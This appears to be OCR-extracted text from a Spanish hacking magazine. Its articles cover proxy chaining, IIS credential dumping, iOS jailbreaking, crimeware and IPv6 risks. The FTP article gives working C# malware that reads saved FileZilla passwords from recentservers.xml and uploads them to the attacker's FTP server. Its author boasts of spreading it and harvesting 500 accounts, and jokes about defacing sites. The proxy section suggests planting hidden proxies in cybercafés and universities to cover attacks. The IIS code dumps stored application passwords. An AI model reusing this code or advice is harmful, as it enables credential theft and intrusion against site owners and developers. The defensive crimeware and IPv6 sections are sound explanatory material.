63.149.98.18

IP. Es la IP con la que nos camuflajearemos y la que vern todas las paginas
que visitaremos, van entendiendo? ;P
Puerto. Canal de comunicacin por
donde mandaremos y recibiremos la
informacin.
Type. Creo que es la ms importante
ya que siempre deberemos escoger los
que tengan el tipo de HIgh Anonymity ya que estos no guardan Logs de
las computadoras que se conectan a
ellos y as si nos quieren rastrear
pues ser sper pero sper
difcil que nos localicen.

Bien con eso ya tenemos nuestro equipo configurado para navegar con
un servidor Proxy y ocultos detrs de este, por lo tanto como quedo la conexin la plasmaremos en el esquema siguiente: (imagen)

PROXY CHAIN SERVER


OK continuemos como deca Ral
Velasco AUN HAY MAS, que quiero decir con esto, todava podemos
OK! Recuerden por favor que este es el ms sencillo de los mtodos y tenhacer mas annima nuestra navegadramos que verificar si realmente est ocultando nuestra identidad, pero la
cin, por medio de una tcnica llamada
tcnica de verificacin de identidad la dejaremos para el final del artculo.
pROXYchAIN con la cual nos conectaramos a mas de 1 servidor Proxy,
por ejemplo nuestra conexin verdadera
esta en Mxico pero nos conectamos a un Proxy que
est en China y luego a uno en Afganistn y despus a
otro que est en Inglaterra y por ltimo uno que este en
Finlandia y aparte de esto todos los servidores son HIgh
Anonymity, hehehe que creen que pase?, pues estn en
lo cierto seria una tarea descomunal y una gran cantidad
de recursos se necesitaran para poder rastrear el origen
de la conexin, en el siguiente esquema planteo la
conexin por medio de Proxy Chain Servers:

18

www.hackingmexico.mx

navegacin annima

Como pueden ver este tipo de


conexin necesita de ms recursos,
y se asemeja mucho a lo que vemos
en las pelculas de gangters informticos donde tratan de rastrear al
delincuente informtico y se dan
cuenta que la conexin pasa por varios pases o cambio de localizacin,
aqu lgicamente se las muestro en
su forma real y sin tanto efecto especial de Hollywood pero realmente
esta si es efectiva, el nico problema
que le veo es que como se genera
una conexin con varios servidores
tendramos que tener proxy rpidos
para poder llevar a cabo esta tcnica,
como les deca a mis alumnos de
la certificacin de hacking tico
que doy, ---los delincuentes van
un paso delante de nosotros y un
experto en seguridad informtica
debe de pensar como ellos para as
no quedarse atrs y poder aplicar
seguridad ofensiva en el momento
oportuno, tomando en cuenta esto,
yo lo que hara es instalar un proxy
server oculto en un cibercaf en una
ciudad, otro en una universidad en
una ciudad diferente y as hacerlo en
dos o tres lugares ms donde se que
la conexin es estable y rpida, con
eso garantizara la conexin para
atacar---.
Pero muchos se preguntaran a
estas alturas con que utilera podra hacer esto? Bueno pues muy
fcil, existe una utilera llamada
SocksChain que es un programa
que permite trabajar con cualquier
servicio a travs de una cadena de
Sockets o proxy server HTTP para
ocultar la IP real, este puede trabajar con TELNET, IRC etc.

PRINCIPIOS DE
OPERACIN
DE SOCKSCHAIN SERVER
SocksChain transmite la llamada
TCP del programa cliente (Firefox) a travs de una cadena de
proxy servers, Sockschain solo
se conecta el primer proxy server
de la cadena y el primer proxy
server a su vez manda la peticin
de conexin al segundo y as hasta
llegar al final de la cadena configurada, usando esta tipo de conexin donde el primero llamada al
segundo y el segundo al tercero y
el tercero al siguiente en la cadena,
el rastreo de la conexin inicial
es muy compleja, esto no quiere
decir que sea imposible de rastrear
ya que se podra seguir el orden
inverso de la conexin analizando
los logs de los servers conectados,
pero surge una pregunta si alguno
de los servidores de la cadena no
guardo los logs? Pues hasta ah
llego el rastreo ;), tericamente
este tipo de conexin provee un
alto grado de anonimato, me atrevera a decir que el grado de anonimato sera de un 70% y podra
aumentar el % si lo combinamos
con otras tcnicas pero tengan en
cuenta que el largo de la cadena
es inversamente proporcional a la
velocidad de conexin.

www.hackingmexico.mx

19

navegacin annima

CONFIGURACIN
DEL SOCKSCHAIN
Ahora veremos un software
que tambin tiene lo suyo, este
sirve para hacer manualmente
un Proxychain, o sea un
encadenamiento de varios Proxy`s
para as tener relativamente un
buen anonimato en la red.
Como dice mi hijo
papa menos platica y
mas accin hehehe, ok la
versin que instalaremos ser
SOCKSCHAIN v 3.11.151
mucha gente dice que este
software ya no funciona y
realmente en el sentido estricto
tienen razn ya que la lista de
Proxy`s servers que trae por
default est obsoleta, pero
aqu no usaremos esa lista si
no que vamos a crear nuestra
propia lista de servidores que
obtendremos de la pagina
mencionada en el apartado
CONFIGURACION DE
UTILERIAS.
Primeramente instalaremos
el sockschain como todo en
windows siguiente .. siguiente
hasta finalizar la instalacin, un
vez ah abrimos el programa y nos
aparecer la siguiente ventana:

20

www.hackingmexico.mx

En la cual podemos ver


diferentes iconos, ahora damos
clic en el icono que tiene
como dos calcetines
colgados y aparece
la siguiente ventana
la cual nos muestra
una lista de servidores
Proxy a los cuales nos
podramos conectar, una vez
ah le damos click en UPDATE
LIST la cual bajara la nueva lista
de servidores Proxy que estn
disponibles para su uso le damos
clic y esperamos que actualice,
una vez realizada, le damos clic
en el botn llamado TEST ALL
esto para que pruebe si los Proxy
servers estn disponibles para su
uso y conectados.

Aqu como pueden ver ustedes aparecen unos servidores con un foquito
y otros con un icono circulo Rojo con
una X blanca eso quiere decir que los
segundos no estn en funcionamiento
entonces Tendremos que borrarlos seleccionndolos y dando clic en el botn
DELETE ya que estn en la lista solo
los que funcionaran, cerramos la ventana y ahora si a empezar la configurar el sockschain.

navegacin annima

Una vez actualizada y


testeados todos los Proxy servers aparecer algo como en la
siguiente ventana: (imagen)

Ahora configuremos nuestra cadena de servidor Proxy a


los cuales nos conectremos para
ocultar Nuestra IP, para eso damos
clic en la ventana principal del programa en el signo de + de color verde, donde saldr la siguiente ventana:

Una vez estando ah en la ventana de creacin de la candena, vamos a configurar primeramente en la opcin llamada NAME le ponemos el nombre
con el cual identificaremos a nuestra cadena de conexin despus vamos a la
opcin donde pondremos la cantidad de Proxy`s servers a los que nos conectremos en este caso haremos una conexin a TRES servidores.
Punto seguido vamos ahora si a aadir las ip de los servidores a los cuales nos
conectaremos como se muestra en la imagen de arriba, ya seleccionados damos clic
en el botn OK y listo programa configurado, ahora si viene la prueba de fuego deberemos configurar nuestro explorador de Internet manualmente para que se conecte,

ya no explicare esto aqu ya que en


el apartado de configuracin manual
ah lo explico cmo hacerlo, solo dir
que como Proxy Server debern poner
127.0.0.1 por el puerto 1080 guardas
los cambios y ahora si a probar la conexin arrancamos el explorador de Internet y vern como en el sockschain aparece
el encadenamiento que se est haciendo en la
siguiente ventana un ejemplo:
Con esto nos podemos dar cuenta que funciona
perfectamente el encadenamiento, en prximas
ediciones de la revista veremos las dems tcnicas que faltan por analizar.
Saludos.

www.hackingmexico.mx

21

Mi
cro
hacking microsoft c#

Hacking

soft

22

www.hackingmexico.mx

se maneja para hostear aplicaciones en servidores compartidos.


La estrategia para alcanzar el objetivo es
consultar todas las aplicaciones en el IIS, navegar atravez de sus aplicaciones y como es buena
prctica en las aplicaciones web, las cadenas de
conexin utilizan integrate security, que significa esto? Que utilizamos una cuenta de dominio
para poder firmarnos en el servidor SQL, con lo

cual el password nunca aparecer en el archivo


de configuracin.
La aplicacin navegara atreves de todas
las aplicaciones web y nos arrojara el nombre
de usuario y la contrasea de todas las aplicaciones hosteadas en ese server y con esto
tendremos acceso tanto a la base de datos como
a cualquier cuenta que tengan privilegios.

hacking microsoft c#

por Mario Alberto Gonzales aka Axxus

n este articulo vamos a demostrar


que con Microsoft tambin es posible realizar hacking utilizando
cdigo relativamente sencillo. El
objetivo es obtener el usuario y
el password con el cual est corriendo y autenticndose una aplicacin en el servidor web
(IIS), tomaremos como talon de Aquiles para
este servidor el actual esquema de negocio que

El cdigo es tan sencillo como el siguiente


ServerManager man=new ServerManager();
Console.Clear();
foreach (var site in man.Sites)
{
foreach (var app in site.Applications.ToList())
{
foreach (var directory in app.VirtualDirectories)
{
Console.WriteLine(Sitio {0} App {1}
UserName:{2},Password:{3},
site.Name,
directory.Path,directory.
UserName,directory.Password);
}
}
}
Console.ReadLine();

tC#
Salida Consola

Debug en el Ide

www.hackingmexico.mx

23

hackintosh

Hack

jailbreak en d

aludos amigos mios, soy


M4ku4Z^^ y es un placer
formar parte de este proyecto tan interesante al cual fui
aceptado por el buen Megabyte, algunos ya
me conocen otros no tanto , espero poder
contribuir con este proyecto y al igual si
tienen dudas ya saben como contactarme .
Vamos a analizar el jailbreak a dispositivos iOS de Apple , revisar por que si o por
que no debemos hacer el jailbreak, tambin
averiguaremos si nuestros dispositivos son
candidatos o aptos para hacerlo.
Actualmente se pueden hacer jailbreak a los siguientes dispositivos de
Apple como los con :
-Ipod touch de 1 generacin
-Ipod touch de 2 generacin
-Ipod touch de 3 generacin
-Ipod touch de 4generacion
-Iphone classic (1 generacin)
-Iphone de3 Generacin
-Iphone de 4 Generacin
-Ipad de 1 generacin
-Apple tv de 2 generacin.

En mis palabras, seria como sacar


todo el provecho mximo de los dispositivos que Apple nos vende.
Hasta la Fecha he logrado hacer jailbreak a ipods touchs, iphones, ipads y
Apple tv 2G.
No es ilegal hacer el jailbreak a ningn dispositivo , pero lo que es ilegal
es instalar aplicaciones de la APP STORE crackeadas, eso lo conseguimos con
APPSYNC (pronto veremos su funcionamiento).
He de comentarles que el proceso de
jailbreak es diferente segn el IOS (versin de software instalado en el idevice)
.El firmware mas acual es el IOS 5.1 , yo
aun no lo he instalado en ninguno de mis
dispositivos , pero mas adelante, en el
siguiente tutorial haremos una pequea
resea de que es lo nuevo en ese IOS.
Al Hacer Jailbreak al dispositivo obtenemos bastantes mejoras en el desempeo
del idevice , un ejemplo y el
mas aclamado lo vemos en
el iphone de cualquier generacin la cual es la liberacin
del carrier o de las bandas , esto nos quiere
decir que podemos usar el iphone con la
operadora que mas nos convenga , ya sea
por precio , cobertura , por preferencia , o
simplemente por decidir tener el iphone libre . Aqu hay dos cosas muy importantes:
Al hacer jailbreak, no significa que tendremos liberado el telfono, eso es otro proceso que veremos mucho mas adelante.

Definicin de Jailbreak
Tomado de Wikipedia
Jailbreak: (en espaol, escaparse de la
crcel o, ms literalmente, rompecrcel),
un proceso que permite a los usuarios de
los dispositivos iPhone, iPod Touch, iPad
y Apple TV de todas las generaciones ejecutar aplicaciones distintas a las alojadas
en App Store, el sitio oficial de descarga
de programas para estos dispositivos.

24

www.hackingmexico.mx

ispositivos IOS
Al hacer
jailbreak, no
significa que
tendremos
liberado el
telfono,
eso es otro
proceso que
veremos
mucho mas
adelante.

ALGUNOS BENEFICIOS DE UN
DISPOSITIVO IOS CON Y SIN
JAILBREAK
Al Hacer el jailbreak obtendremos beneficios
que no podemos tener con un dispositivo por
llamarlo de alguna manera normal.
A continuacin detallare los beneficios
que su servidor ha usado en sus dispositivos:
Como pueden ver amigos los beneficios son bastantes buenos , pero la
lista no termina ah, son demasiados los
que podemos obtener, los cuales iremos
aprendiendo a instalar y usar .
CARACTERSTICAS PARA
OBTENER BENEFICIOS DEL
JAILBREAK
Como instalo dicho software para tener
esos beneficios?
La respuesta es muy simple, tenemos
que realizar el jailbreak al sistema IOS
del dispositivo.
Mi dispositivo de Apple es apto para
Tener jailbreak?
Si pero debe cumplir ciertos requisitos, antes de hacer un jailbreak es importante leer y saber que vamos a hacer
exactamente.

hackintosh

intosh

Por Juan Angel Osorio M4ku4z

M4ku4Z^^
m4ku4z@m4ku4z.net
www.m4ku4z.net

Para poder hacer jailbreak a nuestro


dispositivo es importante sabe que no
hay un jailbreak en general para todos los
productos Apple , esto varia segn :
-Generacin del Dispositivo
-Versin de Firmware
-Modelo del dispositivo.
Mi dispositivo pierde garanta frente
a APPLE si le hago jailbreak?
La respuesta es NO , por que? , por
que no modificamos el hardware , pero
si modificamos el software, un ejemplo
muy claro seria , supongamos que mi
IPHONE tiene jailbreak y esta liberado,
trabaja bien en pocas palabras , pero..
falla la red 3G y tengo contratado un
plan de datos con la operadora X, como
le hago para llevarlo a la empresa X y
que me hagan valida la garanta (obvio
tuve que haber descartado previamente ,
ajustes de servicios 3G o que alguna aplicacin interfiera con la conexin del telfono hacia la operadora) , Si bien se sabe
si llevas un dispositivo a que te valide la
garanta y tiene jailbreak la garanta se
anula , pero si restauramos un firmware
limpio se borra todo y procedemos a reclamar la garanta.

DESPDIDA
Bueno amigos , hemos llegado a la recta final de esta seccin , donde aprendimos a conocer todo el potencial que podramos tener si hacemos jailbreak a nuestros dispositivos
, adems de conocer algunas preguntas que se hacen muchos cuando van empezando en
esto del jailbreak . Por mi parte es todo , sin antes agradecer su atencin y nos vemos
pronto en otro capitulo ms.

www.hackingmexico.mx

25

robo de cuentas FTP

Robo de
H

ola mi nickname es CorruptedByte y en esta ocasin


abordaremos el tema de la
cuentas FTP y las vulnerabilidades con
las que cuenta FileZilla el cliente FTP
ms usado por muchas razones, adems
les dejare el cdigo fuente de un pequeo
script que desarrolle en C# .NET para el
robo de cuentas FTP del cliente FileZilla.

Qu es FTP?

FTP o como en ingles se dice File Transfer Protocol, Protocolo de Transferencia


de Archivos es un protocolo de red para
la transferencia de archivos entre sistemas conectados a una red basado en la
arquitectura cliente-servidor. Es muy
sencillo de entender, del lado del cliente
(Tu, tu computadora) manda una peti-

26

www.hackingmexico.mx

cin al servidor para descargar o enviar


un fichero y el servidor responde con ese
fichero, a grandes rasgos eso es lo que es
FTP aunque cuenta con un proceso ms
complejo, pero eso lo pueden estudiar
ms a fondo en nuestro seor Wikipedia,
o lo pueden Googlear. Este protocolo
se utiliza por lo regular para entrar a un
servidor web y subir pginas web, por lo
cual teniendo la cuenta FTP de la pgina
de pea nieto por ejemplo, pues entras, le
borras la pagina y subes una tuya nomas
para darle en la madre.|

Robo de
cuentas FTP

Hay muchas maneras de robar cuentas FTP como infeccin por troyanos,

keyloggers, sniffing, penetracin mediante vulnerabilidades de tu sistema


operativo ya sea con Metasploit o a
mano e incluso XSS, entre otras, pero
aqu para que no anden de juackers adivinando contraseas, o haciendo fuerza
bruta como el megabyte (just kidding),
les voy a mostrar las vulnerabilidades
con las que cuenta el cliente FTP Filezilla que es el ms utilizado por los
desarrolladores web y como explotar
esas vulnerabilidades programando un
script, el da que libere el script con diferentes mtodos de spreading obtuve
500 cuentas FTP en un solo da ya que
muchos freelancers usan este cliente
para administrar las diferentes pginas
web de sus clientes, entonces una sola
persona puede tener hasta 30 cuentas
FTP guardadas de sus clientes.

robo de cuentas FTP

cuentas

FTP

Vulnerabilidades
en FileZilla

Al principio mencione acerca de que FileZilla


tiene vulnerabilidades, son 2 vulnerabilidades
que mas que vulnerabilidades de programacin son vulnerabilidades de logstica la primera es el guardado automtico de las cuentas FTP, si t te entras a un servidor con FTP
con FileZilla el automticamente las guarda
en su registro, ni si quiera te pregunta es una
opcin marcada por defecto, la segunda y
ms importante as como estpida es la manera en que almacena sus contraseas, FileZilla
no almacena las contraseas como lo hace el
MSN u otros programas que con las mismas
dlls del sistema encriptan las cuentas, FileZilla las almacena en un XML en texto plano en
el siguiente formato:

<?xml version=1.0 encoding=UTF-8 standalone=yes ?>


<FileZilla3>
<RecentServers>
<Server>
<Host>CorruptedByte.net</Host>
<Port>21</Port>
<Protocol>0</Protocol>
<Type>0</Type>
<User>CorruptedByte</User>
<Pass>MiContra</Pass>
<Logontype>1</Logontype>
<TimezoneOffset>0</TimezoneOffset>
<PasvMode>MODE_DEFAULT</PasvMode>
<MaximumMultipleConnections>0</MaximumMultipleConnections>
<EncodingType>Auto</EncodingType>
<BypassProxy>0</BypassProxy>
</Server>
</RecentServers>
</FileZilla3>
Como pueden ver esta guardado en texto plano sin ningn tipo de encriptacin a simple
vista puedes ver como tienes los sub nodos con las credenciales FTP (Host, Port, User,
Pass), esto es una gran vulnerabilidad ya que como lo mencione es de los clientes FTP
ms usado por los desarrolladores web que manejan diferentes servidores, este archivo
se encuentra en la siguiente ruta:
C:\Users\CorruptedByte\AppData\Roaming\FileZilla\recentservers.xml
www.hackingmexico.mx

27

robo de cuentas FTP

Desarrollemos
el script

Ahora les mostrare como programar un


script para robar las cuentas FTP de FileZilla, esto lo hare en C# por que es donde
programe todo un malware para robo de
bsicamente cualquier tipo de cuentas.
Primero que nada lo que vamos a
programar ser un mtodo para sacar las
cuentas del FileZilla y guardrnoslas en
un archivo de texto y esto se hace de la
siguiente manera:

28

www.hackingmexico.mx

public void FileZillaAccounts(string sLogsPath)


{
XmlDocument xmlAccountsFile = new XmlDocument();
string sFilePath =
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() +
\\FileZilla\\recentservers.xml;
xmlAccountsFile.Load(sFilePath);
xmlNodeList xmlRecentServers = xmlAccountsFile.GetElementsByTagName(
RecentServers);
xmlNodeList xmlList = ((XmlElement)xmlRecentServers[0]).
GetElementsByTagName(Server);
string sAccount;
foreach (XmlElement nodo in xmlList)
{
XmlNodeList xmlHost = nodo.GetElementsByTagName(Host);
XmlNodeList xmlPort = nodo.GetElementsByTagName(Port);
XmlNodeList xmlUser = nodo.GetElementsByTagName(User);
XmlNodeList xmlPass = nodo.GetElementsByTagName(Pass);
sAccount = string.Format(Host: {0} Port: {1} User: {2} Pass: {3},
xmlHost[0].InnerText, xmlPort[0].InnerText, xmlUser[0].InnerText, xmlPass[0].
InnerText);
FileStream fsLogs = new FileStream(sLogsPath, FileMode.OpenOrCreate,
FileAccess.Write);
fsLogs.Close();
StreamWriter swAccount = File.AppendText(sLogsPath);
swAccount.WriteLine(sAccount);
swAccount.Close();
}
}

robo de cuentas FTP

Es un mtodo muy simple (claro para los que sabemos programar, si no sabes pues hay esta nuestro seor Google), a
simple vista se ve que lo nico que hace este mtodo es crear
un objeto XML para trabajar con el asi como se le da la ruta de
manera automtica con esta lnea:
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() +
\\FileZilla\\recentservers.xml;
.NET nos facilita la ruta y as nos quitamos el problema que nos
topamos con que el fichero XML este dentro de una carpeta dentro de otra carpeta con el nombre de usuario de la maquina que
obviamente desconocemos. Despus se procesa todo el XML y
se saca el valor de cada nodo que tiene las credenciales FTP, una
vez haciendo esto solo se guarda en un archivo de texto, pero obviamente con esto nosotros no tendramos las credenciales FTP
solo se almacenaran en un archivo de texto de la vctima, para
eso ahora programaremos un mtodo para enviar las contraseas
por medio de FTP a nuestro servidor, de la siguiente manera:
public void Send(string sHost, string sDir, string sUser, string sPass, string sFile)
{
string ftpHostDirFile = ftp:// + sHost +sDir +sFile;
FtpWebRequest ftp = (FtpWebRequest)FtpWebRequest.
Create(ftpHostDirFile);
ftp.Credentials = new NetworkCredential(sUser, sPass);
ftp.KeepAlive = true;
ftp.UseBinary = true;
ftp.Method = WebRequestMethods.Ftp.UploadFile;
FileStream fs = File.OpenRead(sFile);
byte[] buffer = new byte[fs.Length];
fs.Read(buffer, 0, buffer.Length);
fs.Close();
Stream ftpstream = ftp.GetRequestStream();
ftpstream.Write(buffer, 0, buffer.Length);
ftpstream.Close();
}
Con este mtodo nada mas le pasamos nuestras credenciales
FTP para mandar el fichero con las contraseas y ya en el mtodo principal solo llamamos a los mtodos que programamos anteriormente, la otra manera de hacerlo ms simple es
mandando directamente el fichero XML por FTP pero cuando
lo programe estaba programando un sistema de facturacin
electrnica y estaba practicando con los objetos XML, a este
cdigo le falta mucho yo solo les di el mtodo principal que
es como extraer las contraseas pero el malware completo que
desarrolle tiene mtodos de spreading, ofuscacin, ejecucin
durante el arranque, entre otros as como mtodos para el robo
de cuentas guardadas en chrome, firefox, internet explorer,
MSN y otros clientes FTP menos usados. Si el megabyte no se
rockstarea cuando se haga popular la revista y me deja escribir
para la revista, seguir compartiendo muchos otros mtodos
para escritura de malware ya un poco ms avanzados entre
otras cosas interesantes.
www.hackingmexico.mx

29

robo de identidad mediante crimeware

Robo
de

Identidad

mediante

Crimeware
Por: Arturo Zamora

@zeux0r
zeux0r@insecure.org.mx

30

www.hackingmexico.mx

El robo de identidad mediante el crimeware, actualmente es uno de los negocios mas lucrativos para los delincuentes informticos, en la actualidad obtienen
ganancias muy importantes, pero Porqu es esto tan lucrativo?
Bueno como sabemos para los delincuentes informticos este tipo de actividades
requieren de una inversin mnima y mximas ganancias, estamos hablando de invertir y generar un 99.09 % de ganancias, y con un mnimo de esfuerzo.As es el por
que el crimeware ha crecido demasiado en los ltimos aos.

Qu es el crimeware y como funciona?


Se le da el nombre de crimeware a aquel software diseado para el robo de cuentas o
robo de identidad del afectado, siendo usadas para obtener beneficios econmicos altamente redituantes, este nombre se le da a keyloggers, backdoors, trojanos, entre otros, la
mayora de este tipo se software es encontrado con el modo de una botnet, las funciones
de este tipo de software daino son muchas, desde controlar nuestro ordenador, ver lo que
estamos realizando, tener acceso a el de manera remota y oculta ya que esto le permite al
atacante obtener la informacin deseada y mantener el control sobre cada una de las personas infectadas por dicho software botnet si es su caso.

robo de identidad mediante crimeware

Introduccin

Ingeniera social
Hay varias maneras de adquirir estos tipos de infecciones en la red, una de ellas es la ingeniera social.
Por lo regular el atacante maneja la ingeniera social a su favor invitando a los objetivos a entrar a
ver un anuncio, ya sean videos, fotos, etc.
Ya que las personas tenemos un defecto muy grande el cual se le llama curiosidad. Y por el simple
morbo de ver que sucede o que contiene ese correo aceptamos sin ni siquiera saber quien es el que
enva el correo o si esta verificado y as podemos ser una victima, otra de ellas es mediante el traspaso
de archivos de personas extraas que se hacen pasar por amigos para solamente robarte tu informacin
como estas hay muchsimas otras que por curiosidad acepten el contenido y queden vulnerables a perder
su informacin confidencial .

Ingeniera social
En el caso de las empresas el fall estara en los empleados, que a veces por falta de capacitacin
cometen estos errores.
Un caso seria la dependencia de soporte tcnico o de ayuda del personal de servicios informticos y podra pasar esto:
Simulacin de ingeniera social
interactuando con la persona
Riiiiiiing riiiiiiiing (sonido telefonico)
Asistente ejecutiva: Bueno?
Chico malo: Que tal Amy buenas tardes soy de soporte tcnico, oye mira me informaron
que tu equipo esta demasiado lento y quiero corroborar a que se debe.
Asistente ejecutiva: Hay que bueno, si mira es que se me pone muy
lenta la mquina y no puedo trabajar bien.
Chico malo: Ok, mira tienes un icono de asistencia remota en tu escritorio, brelo y
me podras proporcionar tu usuario y contrasea para entrar a tu equipo as revisarlo
de manera remota?
Asistente ejecutiva: Claro que si, mi usuario es ***** y mi contrasea *******

www.hackingmexico.mx

31

robo de identidad mediante crimeware

Simulacin de ingeniera social interactuando con la persona.


Aqu el atacante estudio perfectamente su objetivo, saba a que hora llamar y por
parte de la asistente vemos que no pide ni siquiera un nombre, ni departamento,
podra haber llamado primero al superviso o simplemente no haber dado informacin sin antes revisar si hay un ticket abierto y que numero es. As es como muchas
empresas pierden millones hoy en da ya que los usuarios estn malcapacitados y
no tienen informacin de los daos que este tipo de ataques pueden causar

Ataque silencioso
Crimeware no viene solo, por lo regular tiene tambin ayuda de otras vulnerabilidades, estas vulnerabilidades se encargan de ayudar al software malicioso a
infectar a los equipos vulnerables.
Porqu le doy el nombre de ataque silencioso?
Ya hace tiempo existen scripts llamados exploit packs que se encargan de explotar varias vulnerabilidades en sistemas por lo regular estos se aprovechan de
la ejecucin remota en navegadores u otros complementos como lo son Word,
Excel, power point, java, reproductores de video y msica. Este error
hace que el usuario al aceptar, entrar o abrir un sitio quede automticamente infectado y sea una victima mas de este software. Con la ayuda de los exploit packs
el software se encontrara incrustado en el cdigo fuente del sitio como un frame
abriendo otro sitio o como un applet o ventana emergente tratando de hacer que
lo veamos casi obligatoriamente

Alerta sistema Infectado


Cuando el sistema ha sido infectado, aparte de estar perdiendo informacin confidencial,
tambin en algunos casos se perderan cantidades monetarias del usuario victima de
sus cuentas bancarias, tarjetas de crdito, pero eso no seria todo, si no tambin el usuario
victima estara perdiendo su identidad ya que el atacante puede usar sus recursos para
su beneficio y apoyando a la infeccin y distribucin de este crimeware.

Porqu lo estara apoyando?


Al hablar de estar apoyando a la distribucin e infeccin del crimeware no se trata
de que el usuario victima este de acuerdo con el atacante para esto, si no que
de manera inconsciente la victima puede introducir artculos de almacenamiento
masivo y llevarlo a otros equipos de infectndolos estos si no se encuentran protegidos automticamente como nos muestra la imagen

32

www.hackingmexico.mx

Recoleccin de informacin
La recoleccin de informacin por parte del atacante la hace mediante bases de
datos o envindola via correo electrnico.
Unos ejemplos de ello son Botnets, almacenamiento mediante base de datos
via web. Tu identidad fue robada cuando has sido victima de robo de identidad
ya hay poco que puedas hacer, ya que tu nombre, domicilio entre otras cosas
han sido comprometidos; tambin a veces se tuvieron perdidas econmicas
en compras que no fueron autorizadas por la persona propietaria real de las
cuentas o simplemente extrajeron el dinero sin autorizacin consiente del usuario.

robo de identidad mediante crimeware

Porqu lo estara apoyando?


Los lugares mas comunes de infeccin son escuelas, parques, cibercafs o simplemente lugares pblicos del cual mas de uno tenga acceso.

Proteccin
Los mtodos para protegernos son muchos , y tambin muchos softwares que
nos ayudan a esto.
Lo que tendramos mas en cuenta es controlar un poco mas la curiosidad,
antes de abrir un correo ver si la persona en verdad es quien dice ser, si no tenemos ese nombre en nuestras listas no abrirlo, evitar abrir archivos adjuntos,
no seguir links que nos lleven a otros sitios fuera del correo, no abrir los correos
de bandeja spam, si es que no los conocemos, y si los conocemos verificar que
sea el que lo enva, mantener nuestro antivirus actualizado y verificar una ves
a la semana que nuestro sistema este libre de amenazas, tener un scanner de
malware y que nos avise de sitios potencialmente peligrosos, verificar que no
tengamos procesos raros ejecutndose en nuestro sistema.
Ya si tienes mas paranoia , verificar todas las conexiones que hacemos y a donde
las hacemos, ver nuestro archivo host en caso que estemos usando Windows, y
. Naa creo que esas son todas. FIN?

www.hackingmexico.mx

33

riesgos de seguridad en IPV6

340.2
82.36
6.920
riesgosde .938.
seguridad 463.4
63.37
en
4.607
.431.7
68.21
1.456

IPv6

Msc. Helios Mier

hmier@ieee.org

34

www.hackingmexico.mx

riesgos de seguridad en IPV6

ANTE

CE
DEN
TES

El corazn del funcionamiento bsico de


internet radica en el Protocolo de Internet mejor conocido como protocolo IP,
actualmente en uso en su versin 4 desde
1977 cuya capacidad de direccionamiento de 32 bits fue prevista desde 1995 que
se agotara en algn mediano plazo, lo
cual oficialmente se reconoci ocurri en
2011, quedando solo unas cuantas direcciones por repartir en los registros regionales con un estimado de disponibilidad
slo para unos pocos aos ms.
Desde que se visualiz este escenario de
incapacidad de soportar un crecimiento
sostenido del acceso de nuevos usuarios
y dispositivos al internet, se trabaj en la
creacin de una siguiente versin del pro-

tocolo IP el cul estubo preparado para


finales de los noventas, teniendo casi
10 aos de implementacin y pruebas,
siendo a partir del ao 2005 cuando se
impulsa de manera generalizada una exhortacin global a iniciar la transicin al
nuevo protocolo denominado Protocolo
de Internet versin 6 IPv6.

dera imperativa para todos, sin embargo


muchos implementadores de tecnologa y
usuarios se encuentran con muy variantes
grados de avance o retraso en los preparativos, creando una situacin de riesgos
de seguridad que no se ha visto desde
que internet cambi del protocolo NCP a
TCP/IP hace varias generaciones.

En diversas partes del mundo se han tomado variados esfuerzos para facilitar o
acelerar la transicin al nuevo protocolo
pero sin embargo, se espera que al menos durante un periodo de 10 a 15 aos
se viva una experiencia bastante dispar
en distintas regiones y distintos tipos de
usuarios para adoptar o disear nuevas
tecnologas compatibles con el nuevo
protocolo, lo cual crea un escenario de
seguridad peculiar para muchos debido
a la varianza de preparativos adecuados
y por el retraso en la implementacin en
comparacin con la disponilidad y acceso
a la nueva tecnologa que ya se encuentra
presente en diversos rubros de internet.
La transicin al protocolo IPv6 se consi-

Disponibilidad
inesperada
de IPv6
Casi todos los nuevos productos tecnolgicos en hardware y software con conectividad a internet vienen preparados de fbrica
para usar el protocolo IPv6, y muchos de
ellos vienen con el protocolo habilitado an
cuando no haya una conectividad completa
por parte del ISP, o en caso del que el ISP
ya ofrezca el servicio, que adicionalmente a
la conectividad IPv4, se tengan dispositivos
y servicios conectados por IPv6 sin que el
usuario se de cuenta.

www.hackingmexico.mx

35

riesgos de seguridad en IPV6

Esto obliga que los planes y polticas de


seguridad sean revisadas con prontitud
para contemplar los riesgos de ya contar con la presencia del protocolo IPv6
y establecer mecanismos de seguridad
adecuados para que lo regulen o en su
defecto asegurarse de anular por el momento su presencia para reducir riesgos
como los siguientes que mencionaremos.

Los mecanismos de proteccin que se


basen en alguna forma de control o referencia por direccionamiento IPv4 no tendrn una funcionalidad idntica si se realizan comunicaciones por IPv6, siendo el
ejemplo ms evidente el de los firewalls
por ejemplo en un sistema unix/linux,
donde IPtables funciona por separado de
su contraparte IP6tables.

Convivencia
simultnea
de mltiples

El origen o destino de una comunicacin


que se requiere sea regulada no ser igual
si se realiza por IPv6, an cuando los servicios en capas superiores de OSI sean
por protocolos conocidos, se podran evitar los mecanismos de proteccin simplemente con buscar el acceso a traves de
una direccin IPv6.

protocolos
IPv6 funciona de una manera distinta a
IPv4, de forma que deben de tratarse como
dos elementos aparte aunque se encuentren
presentes en un mismo sistema, lo cual se
espera que sea la situacin predominante
durante el periodo de transicin hasta que
la necesidad de contar an con servicios a
travs de IPv4 sea abandonada.

36

www.hackingmexico.mx

Si bien no ser lo indicado suprimir el


protocolo IPv6 de un sistema, los administradores tienen que aprender a
considerar duplicar los mecanismos de
proteccin para que se apliquen con la
misma efectividad a todo lo que venga
sobre IPv6.

Acceso
directo
por

IPv6

Todo sistema y servicio que funcione


con IPv6 se debe de considerar que se
encuentra con acceso directo y pblico a
internet, de manera que se requiere asegurarse que se cuenta con firewall de red
o al menos con un firewall personal en
cada sistema.
An cuando fsicamente se tenga una red
local y se manejen servicios locales, se
debe de tener siempre presente que con
una direccin IPv6 se encuentra uno de
frente al internet pblico, y por lo tanto al
alcance de cualquier agente externo.
Si bien a cada usuario se le delegar
un segmento IPv6 con considerable
cantidad de direcciones para disponer
de ellas, dependiendo de la forma en

riesgos de seguridad en IPV6

que la autonfiguracin y parmetros


de DHCP que tenga predeterminados
de fbrica su equipo de red, se pueden
tomar algunas deducciones para encontrar otros equipos de red en un segmento perteneciente a un usuario.

Tuneleo y
canales

furtivos
El protocolo IPv6 integra de forma nativa la facilidad para establecer canales
y tuneles encubiertos de comunicacin
buscando seguridad y privacidad de las
